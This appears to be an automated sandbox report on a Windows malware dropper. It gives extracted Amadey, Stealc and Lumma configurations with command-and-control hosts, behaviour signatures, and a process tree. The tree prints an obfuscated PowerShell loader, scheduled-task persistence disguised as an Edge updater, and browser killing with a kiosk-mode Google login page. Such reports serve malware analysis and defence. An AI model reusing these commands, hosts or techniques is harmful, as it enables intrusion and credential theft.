Analysis

  • max time kernel
    145s
  • max time network
    150s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    03-12-2024 08:48

General

  • Target

    2a0efd42c22af406d984461f1226c56f65fb74a9245d5397f94cef43aedce0bc.exe

  • Size

    1.8MB

  • MD5

    7f0a76732977427371079aac4e055a2e

  • SHA1

    c799adbb85ecde3ed6c2cb17c77ee989d73cc9d6

  • SHA256

    2a0efd42c22af406d984461f1226c56f65fb74a9245d5397f94cef43aedce0bc

  • SHA512

    88ed5cac47d9765cde1e83e489e4f7707176fb167318343e8c58611d4fd315de77125866d79a63ef5400f8a0b51048a0ce77298874bf1b62c3bc34f110761b05

  • SSDEEP

    49152:SRom2bAxlKp9HksGRtTvd/oheTzY0/oWnWNm4jDAATj:iom2WlKppG3vt5o4D4jDj

Malware Config

Extracted

Family

amadey

Version

4.42

Botnet

9c9aa5

C2

http://185.215.113.43

Attributes
  • install_dir

    abc3bc1985

  • install_file

    skotes.exe

  • strings_key

    8a35cf2ea38c2817dba29a4b5b25dcf0

  • url_paths

    /Zu7JuNko/index.php

rc4.plain

Extracted

Family

amadey

Version

4.41

Botnet

fed3aa

C2

http://185.215.113.16

Attributes
  • install_dir

    44111dbc49

  • install_file

    axplong.exe

  • strings_key

    8d0ad6945b1a30a186ec2d30be6db0b5

  • url_paths

    /Jo89Ku7d/index.php

rc4.plain

Extracted

Family

stealc

Botnet

default_valenciga

C2

http://185.215.113.17

Attributes
  • url_path

    /2fb6c2cc8dce150a.php

Extracted

Family

lumma

C2

https://crib-endanger.sbs

https://faintbl0w.sbs

https://300snails.sbs

https://bored-light.sbs

https://3xc1aimbl0w.sbs

https://pull-trucker.sbs

https://fleez-inc.sbs

https://thicktoys.sbs

Extracted

Family

stealc

Botnet

drum

C2

http://185.215.113.206

Attributes
  • url_path

    /c4becf79229cb002.php

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
  • Stealc

    Stealc is an infostealer written in C++.

  • Stealc family
  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • Enumerates VirtualBox registry keys 2 TTPs 1 IoCs
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 14 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Checks BIOS information in registry 2 TTPs 28 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 29 IoCs
  • Identifies Wine through registry keys 2 TTPs 13 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 64 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 6 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Drops file in System32 directory 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 14 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Windows directory 4 IoCs
  • Embeds OpenSSL 1 IoCs

    Embeds OpenSSL, may be used to circumvent TLS interception.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 42 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 6 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Checks processor information in registry 2 TTPs 8 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Kills process with taskkill 5 IoCs
  • Modifies registry class 1 IoCs
  • Modifies system certificate store 2 TTPs 10 IoCs
  • Runs net.exe
  • Runs ping.exe 1 TTPs 3 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 14 IoCs
  • Suspicious use of FindShellTrayWindow 21 IoCs
  • Suspicious use of SendNotifyMessage 13 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Views/modifies file attributes 1 TTPs 2 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:1196
      • C:\Users\Admin\AppData\Local\Temp\2a0efd42c22af406d984461f1226c56f65fb74a9245d5397f94cef43aedce0bc.exe
        "C:\Users\Admin\AppData\Local\Temp\2a0efd42c22af406d984461f1226c56f65fb74a9245d5397f94cef43aedce0bc.exe"
        2⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Identifies Wine through registry keys
        • Loads dropped DLL
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Drops file in Windows directory
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of WriteProcessMemory
        PID:2172
        • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
          "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
          3⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Loads dropped DLL
          • Adds Run key to start application
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • System Location Discovery: System Language Discovery
          • Modifies system certificate store
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:2704
          • C:\Users\Admin\AppData\Local\Temp\1011316001\DU1zDwm.exe
            "C:\Users\Admin\AppData\Local\Temp\1011316001\DU1zDwm.exe"
            4⤵
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:2524
            • C:\Windows\system32\attrib.exe
              attrib +H +S C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
              5⤵
              • Views/modifies file attributes
              PID:2000
            • C:\Windows\system32\attrib.exe
              attrib +H C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
              5⤵
              • Views/modifies file attributes
              PID:2076
            • C:\Windows\system32\schtasks.exe
              schtasks /f /CREATE /TN "MicrosoftEdgeUpdateTaskMachineCoreSC" /TR "C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe" /SC MINUTE
              5⤵
              • Scheduled Task/Job: Scheduled Task
              PID:1320
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell ping 127.0.0.1; del DU1zDwm.exe
              5⤵
              • System Network Configuration Discovery: Internet Connection Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:320
              • C:\Windows\system32\PING.EXE
                "C:\Windows\system32\PING.EXE" 127.0.0.1
                6⤵
                • System Network Configuration Discovery: Internet Connection Discovery
                • Runs ping.exe
                PID:1640
          • C:\Users\Admin\AppData\Local\Temp\1011373001\stories.exe
            "C:\Users\Admin\AppData\Local\Temp\1011373001\stories.exe"
            4⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:2884
            • C:\Users\Admin\AppData\Local\Temp\is-94NSE.tmp\stories.tmp
              "C:\Users\Admin\AppData\Local\Temp\is-94NSE.tmp\stories.tmp" /SL5="$B0190,3307684,54272,C:\Users\Admin\AppData\Local\Temp\1011373001\stories.exe"
              5⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of WriteProcessMemory
              PID:600
              • C:\Windows\SysWOW64\net.exe
                "C:\Windows\system32\net.exe" pause video_jet_1232
                6⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:1352
                • C:\Windows\SysWOW64\net1.exe
                  C:\Windows\system32\net1 pause video_jet_1232
                  7⤵
                  • System Location Discovery: System Language Discovery
                  PID:1516
              • C:\Users\Admin\AppData\Local\VideoJet 5.1.3.77\videojet.exe
                "C:\Users\Admin\AppData\Local\VideoJet 5.1.3.77\videojet.exe" -i
                6⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • System Location Discovery: System Language Discovery
                • Modifies system certificate store
                PID:1084
          • C:\Windows\SysWOW64\cmd.exe
            cmd /c ""C:\Users\Admin\AppData\Local\Temp\1011428021\withroot.cmd" "
            4⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:568
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\1011428021\withroot.cmd';$dDiO='LRynPoadRynP'.Replace('RynP', ''),'SpaoCflitaoCf'.Replace('aoCf', ''),'CpVXarepVXaapVXateDpVXaepVXacrpVXayppVXatpVXaorpVXa'.Replace('pVXa', ''),'ChsohbansohbgeEsohbxtsohbensohbssohbisohbosohbnsohb'.Replace('sohb', ''),'CopmwsyyTomwsy'.Replace('mwsy', ''),'RjwWteajwWtdLjwWtinjwWtesjwWt'.Replace('jwWt', ''),'FroxuoEmxuoEBasxuoEe6xuoE4StxuoErixuoEngxuoE'.Replace('xuoE', ''),'InwozUvowozUkwozUewozU'.Replace('wozU', ''),'GVJeMeVJeMtCVJeMurVJeMrVJeMentVJeMProVJeMceVJeMsVJeMsVJeM'.Replace('VJeM', ''),'ElkXvnemekXvnntkXvnAkXvntkXvn'.Replace('kXvn', ''),'EntMmVmryPMmVmoiMmVmntMmVm'.Replace('MmVm', ''),'TUudXranUudXsfUudXorUudXmFiUudXnaUudXlBlUudXocUudXkUudX'.Replace('UudX', ''),'MayhiDinMyhiDoyhiDduyhiDleyhiD'.Replace('yhiD', ''),'DejLwccojLwcmpjLwcresjLwcsjLwc'.Replace('jLwc', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($dDiO[8])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function yLwIh($TZhDQ){$YZolA=[System.Security.Cryptography.Aes]::Create();$YZolA.Mode=[System.Security.Cryptography.CipherMode]::CBC;$YZolA.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$YZolA.Key=[System.Convert]::($dDiO[6])('duQk/QtsCXjlfUWS6XCUuCu5I1g6+OrVeXJ2aigXvB8=');$YZolA.IV=[System.Convert]::($dDiO[6])('9XjdTIP29vRyU5L9wYwsyw==');$BZniG=$YZolA.($dDiO[2])();$mkKMG=$BZniG.($dDiO[11])($TZhDQ,0,$TZhDQ.Length);$BZniG.Dispose();$YZolA.Dispose();$mkKMG;}function XFQUx($TZhDQ){$WCDIU=New-Object System.IO.MemoryStream(,$TZhDQ);$NUdnb=New-Object System.IO.MemoryStream;$TtrMr=New-Object System.IO.Compression.GZipStream($WCDIU,[IO.Compression.CompressionMode]::($dDiO[13]));$TtrMr.($dDiO[4])($NUdnb);$TtrMr.Dispose();$WCDIU.Dispose();$NUdnb.Dispose();$NUdnb.ToArray();}$wHJim=[System.IO.File]::($dDiO[5])([Console]::Title);$kvBry=XFQUx (yLwIh ([Convert]::($dDiO[6])([System.Linq.Enumerable]::($dDiO[9])($wHJim, 5).Substring(2))));$hsQZC=XFQUx (yLwIh ([Convert]::($dDiO[6])([System.Linq.Enumerable]::($dDiO[9])($wHJim, 6).Substring(2))));[System.Reflection.Assembly]::($dDiO[0])([byte[]]$hsQZC).($dDiO[10]).($dDiO[7])($null,$null);[System.Reflection.Assembly]::($dDiO[0])([byte[]]$kvBry).($dDiO[10]).($dDiO[7])($null,$null); "
              5⤵
              • System Location Discovery: System Language Discovery
              PID:2476
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              5⤵
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1696
          • C:\Users\Admin\AppData\Local\Temp\1011445001\rhnew.exe
            "C:\Users\Admin\AppData\Local\Temp\1011445001\rhnew.exe"
            4⤵
            • Suspicious use of NtCreateUserProcessOtherParentProcess
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            PID:2360
          • C:\Users\Admin\AppData\Local\Temp\1011459001\abc488b187.exe
            "C:\Users\Admin\AppData\Local\Temp\1011459001\abc488b187.exe"
            4⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Loads dropped DLL
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Drops file in Windows directory
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of FindShellTrayWindow
            PID:2724
            • C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
              "C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe"
              5⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Loads dropped DLL
              • Adds Run key to start application
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:1920
              • C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default2.exe
                "C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default2.exe"
                6⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                • Checks processor information in registry
                • Suspicious behavior: EnumeratesProcesses
                PID:2112
              • C:\Users\Admin\AppData\Local\Temp\1001527001\alex2022.exe
                "C:\Users\Admin\AppData\Local\Temp\1001527001\alex2022.exe"
                6⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                PID:1392
              • C:\Users\Admin\AppData\Local\Temp\1002824001\349758ca7a.exe
                "C:\Users\Admin\AppData\Local\Temp\1002824001\349758ca7a.exe"
                6⤵
                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                • Checks BIOS information in registry
                • Executes dropped EXE
                • Identifies Wine through registry keys
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                PID:1768
              • C:\Users\Admin\AppData\Local\Temp\1003013001\AllNew.exe
                "C:\Users\Admin\AppData\Local\Temp\1003013001\AllNew.exe"
                6⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Drops file in Windows directory
                • System Location Discovery: System Language Discovery
                • Suspicious use of FindShellTrayWindow
                PID:2204
                • C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe
                  "C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe"
                  7⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  PID:868
              • C:\Users\Admin\AppData\Local\Temp\1003620001\trru7rd2.exe
                "C:\Users\Admin\AppData\Local\Temp\1003620001\trru7rd2.exe"
                6⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                PID:2808
              • C:\Users\Admin\AppData\Local\Temp\1004899001\am209.exe
                "C:\Users\Admin\AppData\Local\Temp\1004899001\am209.exe"
                6⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Drops file in Windows directory
                • System Location Discovery: System Language Discovery
                • Suspicious use of FindShellTrayWindow
                PID:1688
                • C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe
                  "C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe"
                  7⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  PID:2296
                  • C:\Windows\SysWOW64\rundll32.exe
                    "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\clip64.dll, Main
                    8⤵
                    • Blocklisted process makes network request
                    • System Location Discovery: System Language Discovery
                    PID:1504
              • C:\Users\Admin\AppData\Local\Temp\1005061001\nSoft.exe
                "C:\Users\Admin\AppData\Local\Temp\1005061001\nSoft.exe"
                6⤵
                • Suspicious use of NtCreateUserProcessOtherParentProcess
                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                • Checks BIOS information in registry
                • Executes dropped EXE
                • Checks whether UAC is enabled
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                PID:2356
              • C:\Users\Admin\AppData\Local\Temp\1005128001\newwork.exe
                "C:\Users\Admin\AppData\Local\Temp\1005128001\newwork.exe"
                6⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • System Location Discovery: System Language Discovery
                PID:3760
                • C:\Users\Admin\AppData\Local\Temp\is-ITQDQ.tmp\newwork.tmp
                  "C:\Users\Admin\AppData\Local\Temp\is-ITQDQ.tmp\newwork.tmp" /SL5="$E0160,3498837,54272,C:\Users\Admin\AppData\Local\Temp\1005128001\newwork.exe"
                  7⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of FindShellTrayWindow
                  PID:3772
              • C:\Users\Admin\AppData\Local\Temp\1005150001\821601d5e0.exe
                "C:\Users\Admin\AppData\Local\Temp\1005150001\821601d5e0.exe"
                6⤵
                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                • Checks BIOS information in registry
                • Executes dropped EXE
                • Identifies Wine through registry keys
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                PID:3644
              • C:\Users\Admin\AppData\Local\Temp\1005151001\a3b589971d.exe
                "C:\Users\Admin\AppData\Local\Temp\1005151001\a3b589971d.exe"
                6⤵
                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                • Checks BIOS information in registry
                • Executes dropped EXE
                • Identifies Wine through registry keys
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • System Location Discovery: System Language Discovery
                • Modifies system certificate store
                PID:4292
          • C:\Users\Admin\AppData\Local\Temp\1011573001\4c597bf8dc.exe
            "C:\Users\Admin\AppData\Local\Temp\1011573001\4c597bf8dc.exe"
            4⤵
            • Enumerates VirtualBox registry keys
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            PID:1648
          • C:\Users\Admin\AppData\Local\Temp\1011574001\b93e3998e9.exe
            "C:\Users\Admin\AppData\Local\Temp\1011574001\b93e3998e9.exe"
            4⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Modifies system certificate store
            • Suspicious behavior: EnumeratesProcesses
            PID:2524
          • C:\Users\Admin\AppData\Local\Temp\1011575001\5b34f7be27.exe
            "C:\Users\Admin\AppData\Local\Temp\1011575001\5b34f7be27.exe"
            4⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            PID:788
          • C:\Users\Admin\AppData\Local\Temp\1011576001\e0e4cd0f69.exe
            "C:\Users\Admin\AppData\Local\Temp\1011576001\e0e4cd0f69.exe"
            4⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of SendNotifyMessage
            PID:1992
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /F /IM firefox.exe /T
              5⤵
              • System Location Discovery: System Language Discovery
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:300
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /F /IM chrome.exe /T
              5⤵
              • System Location Discovery: System Language Discovery
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:2828
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /F /IM msedge.exe /T
              5⤵
              • System Location Discovery: System Language Discovery
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:2304
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /F /IM opera.exe /T
              5⤵
              • System Location Discovery: System Language Discovery
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1612
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /F /IM brave.exe /T
              5⤵
              • System Location Discovery: System Language Discovery
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:584
            • C:\Program Files\Mozilla Firefox\firefox.exe
              "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
              5⤵
                PID:2320
                • C:\Program Files\Mozilla Firefox\firefox.exe
                  "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                  6⤵
                  • Checks processor information in registry
                  • Modifies registry class
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of FindShellTrayWindow
                  • Suspicious use of SendNotifyMessage
                  PID:1848
                  • C:\Program Files\Mozilla Firefox\firefox.exe
                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1848.0.2011692218\617303298" -parentBuildID 20221007134813 -prefsHandle 1276 -prefMapHandle 1160 -prefsLen 20847 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {c4e1f04c-1b53-4370-b717-f44279e68337} 1848 "\\.\pipe\gecko-crash-server-pipe.1848" 1352 fdb8a58 gpu
                    7⤵
                      PID:1996
                    • C:\Program Files\Mozilla Firefox\firefox.exe
                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1848.1.767604101\1297631509" -parentBuildID 20221007134813 -prefsHandle 1556 -prefMapHandle 1552 -prefsLen 21708 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {8fcf0361-f01c-46ca-af23-af1d49b4f0cd} 1848 "\\.\pipe\gecko-crash-server-pipe.1848" 1568 fddee58 socket
                      7⤵
                        PID:1976
                      • C:\Program Files\Mozilla Firefox\firefox.exe
                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1848.2.915000656\1679466280" -childID 1 -isForBrowser -prefsHandle 2056 -prefMapHandle 2052 -prefsLen 21746 -prefMapSize 233444 -jsInitHandle 596 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {4c92ed1d-d0ea-484d-bb4f-e48535f00a1e} 1848 "\\.\pipe\gecko-crash-server-pipe.1848" 2068 19cd4958 tab
                        7⤵
                          PID:2400
                        • C:\Program Files\Mozilla Firefox\firefox.exe
                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1848.3.1052804925\955725325" -childID 2 -isForBrowser -prefsHandle 2896 -prefMapHandle 2892 -prefsLen 26216 -prefMapSize 233444 -jsInitHandle 596 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {bc2bb219-910c-41c8-8c93-cbac4ce8c4f5} 1848 "\\.\pipe\gecko-crash-server-pipe.1848" 2908 d63058 tab
                          7⤵
                            PID:3328
                          • C:\Program Files\Mozilla Firefox\firefox.exe
                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1848.4.992712347\1198772322" -childID 3 -isForBrowser -prefsHandle 3652 -prefMapHandle 3648 -prefsLen 26275 -prefMapSize 233444 -jsInitHandle 596 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {de3048db-e98c-4685-964f-80d5166b1f0c} 1848 "\\.\pipe\gecko-crash-server-pipe.1848" 3660 1e7fdc58 tab
                            7⤵
                              PID:3980
                            • C:\Program Files\Mozilla Firefox\firefox.exe
                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1848.5.1422405652\1255817276" -childID 4 -isForBrowser -prefsHandle 3768 -prefMapHandle 3772 -prefsLen 26275 -prefMapSize 233444 -jsInitHandle 596 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {a4b61ccc-587f-4fb2-b0b5-5a651dacb487} 1848 "\\.\pipe\gecko-crash-server-pipe.1848" 3756 1f146a58 tab
                              7⤵
                                PID:4008
                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1848.6.1914004548\436673662" -childID 5 -isForBrowser -prefsHandle 3956 -prefMapHandle 3960 -prefsLen 26275 -prefMapSize 233444 -jsInitHandle 596 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {0e26cded-c4d6-4962-b481-31457350f003} 1848 "\\.\pipe\gecko-crash-server-pipe.1848" 3944 1f147358 tab
                                7⤵
                                  PID:4020
                          • C:\Users\Admin\AppData\Local\Temp\1011577001\32810b99b0.exe
                            "C:\Users\Admin\AppData\Local\Temp\1011577001\32810b99b0.exe"
                            4⤵
                            • Modifies Windows Defender Real-time Protection settings
                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                            • Checks BIOS information in registry
                            • Executes dropped EXE
                            • Identifies Wine through registry keys
                            • Windows security modification
                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                            • System Location Discovery: System Language Discovery
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            PID:3836
                          • C:\Users\Admin\AppData\Local\Temp\1011578001\33c3247dda.exe
                            "C:\Users\Admin\AppData\Local\Temp\1011578001\33c3247dda.exe"
                            4⤵
                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                            • Checks BIOS information in registry
                            • Executes dropped EXE
                            • Identifies Wine through registry keys
                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                            • System Location Discovery: System Language Discovery
                            PID:3848
                      • C:\Windows\SysWOW64\dialer.exe
                        "C:\Windows\system32\dialer.exe"
                        2⤵
                        • System Location Discovery: System Language Discovery
                        • Suspicious behavior: EnumeratesProcesses
                        PID:636
                      • C:\Windows\SysWOW64\dialer.exe
                        "C:\Windows\system32\dialer.exe"
                        2⤵
                        • System Location Discovery: System Language Discovery
                        • Suspicious behavior: EnumeratesProcesses
                        PID:3788
                    • C:\Windows\system32\taskeng.exe
                      taskeng.exe {8BB4416B-89B9-4BCA-A74E-5235A549A139} S-1-5-21-4177215427-74451935-3209572229-1000:JSMURNPT\Admin:Interactive:[1]
                      1⤵
                        PID:4588
                        • C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
                          C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
                          2⤵
                          • Executes dropped EXE
                          • Suspicious use of SetThreadContext
                          PID:4624
                          • C:\Windows\explorer.exe
                            explorer.exe
                            3⤵
                            • Suspicious use of AdjustPrivilegeToken
                            • Suspicious use of FindShellTrayWindow
                            PID:4632
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            powershell ping 127.1.0.1; del MicrosoftEdgeUpdateTaskMachineCoreSC.exe
                            3⤵
                            • Drops file in System32 directory
                            • System Network Configuration Discovery: Internet Connection Discovery
                            • Suspicious use of AdjustPrivilegeToken
                            PID:4704
                            • C:\Windows\system32\PING.EXE
                              "C:\Windows\system32\PING.EXE" 127.1.0.1
                              4⤵
                              • System Network Configuration Discovery: Internet Connection Discovery
                              • Runs ping.exe
                              PID:4904
                        • C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
                          C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
                          2⤵
                          • Executes dropped EXE
                          • Suspicious use of SetThreadContext
                          PID:3828
                          • C:\Windows\explorer.exe
